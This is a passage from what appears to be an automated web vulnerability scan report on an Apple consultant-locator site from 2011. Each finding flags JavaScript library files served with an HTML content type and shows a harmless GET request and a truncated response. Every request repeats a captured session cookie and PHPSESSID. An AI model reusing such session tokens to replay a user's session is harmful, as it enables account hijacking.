Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 10309
Connection: close
Content-Type: text/html;charset=UTF-8

Array.prototype.exists = function (x) {
for (var i = 0; i < this.length; i++) {
if (this[i] == x) return true;
}
return false;
}

Date.prototype.formatDate = function (input,time)
...[SNIP]...

29.21. http://consultants-locator.apple.com/javascript/jquery.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/jquery.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:13 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 78601
Connection: close
Content-Type: text/html;charset=UTF-8

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

29.22. http://consultants-locator.apple.com/javascript/jquery.tools.min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/jquery.tools.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/jquery.tools.min.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 3701
Connection: close
Content-Type: text/html;charset=UTF-8

/*
* jQuery Tools 1.2.5 - The missing UI library for the Web
*
* [tooltip]
*
* NO COPYRIGHTS OR LICENSES. DO WHAT YOU LIKE.
*
* http://flowplayer.org/tools/
*
* File generated: Fri Nov 26
...[SNIP]...

29.23. http://consultants-locator.apple.com/javascript/portal.1309219793.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/portal.1309219793.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.24. http://consultants-locator.apple.com/javascript/tooltips.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/tooltips.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/tooltips.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 12423
Connection: close
Content-Type: text/html;charset=UTF-8

/* --- BoxOver ---
/* --- v 2.1 17th June 2006
By Oliver Bryant with help of Matthew Tagg
http://boxover.swazz.org */

if (typeof document.attachEvent!='undefined') {
window.attachEvent('onload',in
...[SNIP]...

29.25. http://consultants-locator.apple.com/javascript/treeview/treeview-min.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/treeview/treeview-min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/treeview/treeview-min.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:15 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:15 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 18470
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.5.2
*/
YAHOO.widget.TreeView=function(A){if(A){this.i
...[SNIP]...

29.26. http://consultants-locator.apple.com/javascript/wick.1295053156.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/wick.1295053156.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/wick.1295053156.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 24975
Connection: close
Content-Type: text/html;charset=UTF-8

/*
WICK: Web Input Completion Kit
http://wick.sourceforge.net/
Copyright (c) 2004, Christopher T. Holland
All rights reserved.

Redistribution and use in source and binary forms, with or without modif
...[SNIP]...

29.27. http://consultants-locator.apple.com/javascript/yui/accordionview.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/accordionview.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.28. http://consultants-locator.apple.com/javascript/yui/animation.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/animation.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/yui/animation.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 13777
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
(function(){var B=YAHOO.util;var A=function(D,
...[SNIP]...

29.29. http://consultants-locator.apple.com/javascript/yui/connection.1287529288.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/connection.1287529288.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /javascript/yui/connection.1287529288.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 11604
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
YAHOO.util.Connect={_msxml_progid:["Microsoft.
...[SNIP]...

29.30. http://consultants-locator.apple.com/javascript/yui/container.1287529288.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/container.1287529288.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/yui/container.1287529288.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 74126
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
(function(){YAHOO.util.Config=function(D){if(D
...[SNIP]...

29.31. http://consultants-locator.apple.com/javascript/yui/dom.1287529288.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/dom.1287529288.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/yui/dom.1287529288.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 16067
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
(function(){YAHOO.env._id_counter=YAHOO.env._i
...[SNIP]...

29.32. http://consultants-locator.apple.com/javascript/yui/event.1287529288.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/event.1287529288.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/yui/event.1287529288.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 91513
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/

/**
* The CustomEvent class lets you define
...[SNIP]...

29.33. http://consultants-locator.apple.com/javascript/yui/json.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/json.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /javascript/yui/json.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 2734
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2008, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.5.1
*/
YAHOO.namespace("lang");YAHOO.lang.JSON={_ESCA
...[SNIP]...

